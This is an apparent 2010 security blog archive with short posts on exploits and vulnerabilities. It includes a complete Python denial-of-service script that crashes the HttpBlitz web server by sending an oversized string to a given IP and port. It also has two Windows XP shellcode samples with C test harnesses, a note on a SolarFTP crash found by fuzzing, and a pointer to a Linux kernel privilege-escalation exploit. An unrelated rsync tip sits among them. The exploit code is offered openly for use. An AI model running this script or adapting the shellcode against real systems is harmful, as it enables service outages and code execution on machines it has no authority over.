2010
12.27

BackTrack Site Compromised

Category: Hacking, Info / Tag:  / 4 comments

Wooowww…. Gile… Kalo site sekelas backtrack saja bisa di “miliki”… bagaimana dengan situs yang lainnya…?? (pengen tau jadinya attack vectornya.. :D )

untuk info lebih lanjut click link ini

2010
12.24

HttpBlitz Web Server Denial Of Service Exploit

Category: Exploit, Vulnerability / Tag:  / Add Comment 
#!/usr/bin/python

# Title: HttpBlitz DOS
# Date: 12/24/2010
# Author: otoy
# Software Link: http://sourceforge.net/projects/httpblitz/files/HttpBlitz.msi/download
# Tested on: Windows XP SP3
#
# ======================================================================
#        ___       _ __        __            __    _     __
#   ____/ (_)___ _(_) /_____ _/ / ___  _____/ /_  (_)___/ /___  ____ _
#  / __  / / __ `/ / __/ __ `/ / / _ \/ ___/ __ \/ / __  / __ \/ __ `/
# / /_/ / / /_/ / / /_/ /_/ / / /  __/ /__/ / / / / /_/ / / / / /_/ /
# \__,_/_/\__, /_/\__/\__,_/_/  \___/\___/_/ /_/_/\__,_/_/ /_/\__,_/
#        /____/                      http://www.digital-echidna.org
# ======================================================================
#
# Greetz:
#   say hello to all digital-echidna org crew:
#       modpr0be, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix
#   special thx to offsec, exploit-db, corelan team
#
#### Software description:
# A cross platform Http web server developed using C++. Agile methodology
# with emphasis on :- 1. Good Design 2. Object Oriented Programming 3.
# Refactoring 4. Static/Dynamic Analysis, Unit-testing, Code Coverage 5.
# Software Engineering best practices.
#
#### DOS information:
# you just have to send long string, and it will crash the program.
# just scan the port using nmap will crash the program too.

import socket, sys
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

junk = "\x41" * 80000

def banner():
print "\nHttpBlitz DOS."
print "By: otoy (otoy[at]digital-echidna[dot]org)\n"

if len(sys.argv)!=3:
banner()
print "Usage: %s <ip> <port>\n" %sys.argv[0]
sys.exit(0)

try:
s.connect((sys.argv[1], int(sys.argv[2])))
except:
print "Can\'t connect to server!\n"
sys.exit(0)

s.send(junk+'\r\n')
s.close()

In action:

2010
12.22

Social Engineering: The Art of Human Hacking

Category: Info / Tag:  / Add Comment

Today, the BackTrack team would like to congratulate Chris “loganWHD” for the release of his book, “Social Engineering: The Art of Human Hacking”.

This book has been widely anticipated and will help many new to the field of social engineering answer that age old question: “Where do I start?”

Experienced social engineers will gain benefit as well, as the book dives deep into some of the most complex and important aspects of social engineering. Topics range from information gathering to micro-expressions to non-verbal behavior and much more.

As systems become more and more protected, targeting the users has become the lowest effort way into many companies. Professional penetration testers will gain much value from this book, as it covers many of the most effective attack vectors available today.

-Backtrack Blog-

2010
12.17

SolarFTP 2.0 Multiple Commands Denial of Service Vulnerability

Category: Research, Vulnerability / Tag:  / Add Comment

SolarFTP Server 2.0 is prone to a denial of service condition. It fails to properly sanitize user-supplied input resulting in a denial of service. With a specially crafted ‘USER’, ‘APPE’, ‘GET’, ‘PUT’, and ‘NLST’ command, a remote attacker can potentially disable the FTP service.

Software Description

Solar FTP Server is a handy and easy to use personal FTP server with features like virtual directories, simple and intuitive user interface, real-time activity monitoring and management.

Testing and Fuzzing

Using Very Simple FTP Fuzzer, we test the FTP server with various commands. The first command that we sent was APPE (append). The Windows exception handler pop out. That was verify that the server may be vulnerable to some commands.

Unfortunately, the junk that we sent did not overwrite the SEH nor the EIP. It just end in Denial of Service. In conclusion, there are 4 commands which make the server crash, APPE, NLST, PUT, and GET.

Read More >>

2010
12.09

Linux Kernel <=2.6.37 Local Privilege Escalation Exploit

Category: Exploit / Tag:  / Add Comment

On December, 7th 2010 Dan Rosenberg published his 0day Exploit for Linux Kernel <= 2.6.37 that cause a local privilege escalation. Take a look at the published exploit here (via exploit-db)

Here’s the exploit against Ubuntu Server 10.10.

0day Linux Kernel <=2.6.37 Local Privilege Escalation Exploit

2010
12.08

Sync Between 2 Directories Using Rsync

Category: Tools / Tag:  / Add Comment

I write here so I wouldn’t forget it. These are rsync options to sync between 2 directories. It will skip existing file and directory, keep the time preserve and sync recursively.

rsync -r -n -t -v --progress --ignore-existing -s [SOURCE DIR] [DESTINATION DIR]

This is a DRY RUN, which will not execute the sync.
Do this to make sure that your source directory and destination directory are valid to be synced.

If you’re sure to execute it, just remove the -n option.

2010
12.07

27 Bytes – Windows XP SP3 (en) calc win32 Shellcode

Category: Shellcode / Tag:  / Add Comment 
/*

==========================================================================
       ___       _ __        __                __    _     __
  ____/ (_)___ _(_) /_____ _/ /     ___  _____/ /_  (_)___/ /___  ____ _
 / __  / / __ `/ / __/ __ `/ /_____/ _ \/ ___/ __ \/ / __  / __ \/ __ `/
/ /_/ / / /_/ / / /_/ /_/ / /_____/  __/ /__/ / / / / /_/ / / / / /_/ /
\__,_/_/\__, /_/\__/\__,_/_/      \___/\___/_/ /_/_/\__,_/_/ /_/\__,_/
       /____/                          http://www.digital-echidna.org

==========================================================================

Title     : Windows XP SP3 (EN) 32-bit - calc Shellcode 27 bytes
Author    : otoy
Tested on : WinXP Pro SP3 (EN) 32 bit
Greetz    :
say hello to all digital-echidna org crew:
   modpr0be, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix

special thx to offsec, exploit-db and corelan team */

/*shellcodetest.c*/ 

char code[] =
"\x31\xc0\x50\x68\x63"
"\x61\x6c\x63\x89\xe3"
"\x50\x53\xbb"
"\xfd\x29\x86\x7c" /*Kernel32.dll.WinExec*/
"\xff\xd3\x50\xbb"
"\xfa\xca\x81\x7c" /*Kernel32.dll.ExitProcess*/
"\xff\xd3";

int main(int argc, char **argv)
{
	int (*func)();
	func = (int (*)()) code;
	(int)(*func)();
}
2010
12.06

53 bytes – Windows XP SP3 (en) notepad.exe win32 Shellcode

Category: Shellcode / Tag:  / Add Comment

Finally, my first win32 shellcode..

This will execute notepad.exe when loaded. Run on Windows XP SP3 English.

/*
==========================================================================
       ___       _ __        __                __    _     __
  ____/ (_)___ _(_) /_____ _/ /     ___  _____/ /_  (_)___/ /___  ____ _
 / __  / / __ `/ / __/ __ `/ /_____/ _ \/ ___/ __ \/ / __  / __ \/ __ `/
/ /_/ / / /_/ / / /_/ /_/ / /_____/  __/ /__/ / / / / /_/ / / / / /_/ /
\__,_/_/\__, /_/\__/\__,_/_/      \___/\___/_/ /_/_/\__,_/_/ /_/\__,_/
       /____/                          http://www.digital-echidna.org
==========================================================================
Title: Windows XP SP3 (EN) 32-bit - notepad.exe shellcode 53 bytes
Author: modpr0be
Tested on: WinXP Pro SP3 (EN) 32 bit - Build 2600.xpsp_sp3_gdr.100427-1636
Greetz:
say hello to all digital-echidna org crew:
otoy, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix

special thx to amalia (^^), offsec, exploit-db, and corelan team
*/

/*shellcodetest.c*/

char code[] = "\x31\xc0\x50\xb8\x72\x75\x11\x11"
"\x2d\x11\x11\x11\x11\x50\x68\x6f"
"\x74\x65\x70\x68\x2f\x63\x20\x6e"
"\x68\x65\x78\x65\x20\x68\x63\x6d"
"\x64\x2e\x89\xe3\x50\x53\xbb"
"\x0d\x25\x86\x7c"			/*Kernel32.dll.WinExec*/
"\xff\xd3\x50\xbb"
"\x12\xcb\x81\x7c"			/*Kernel32.dll.ExitProcess*/
"\xff\xd3";

int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}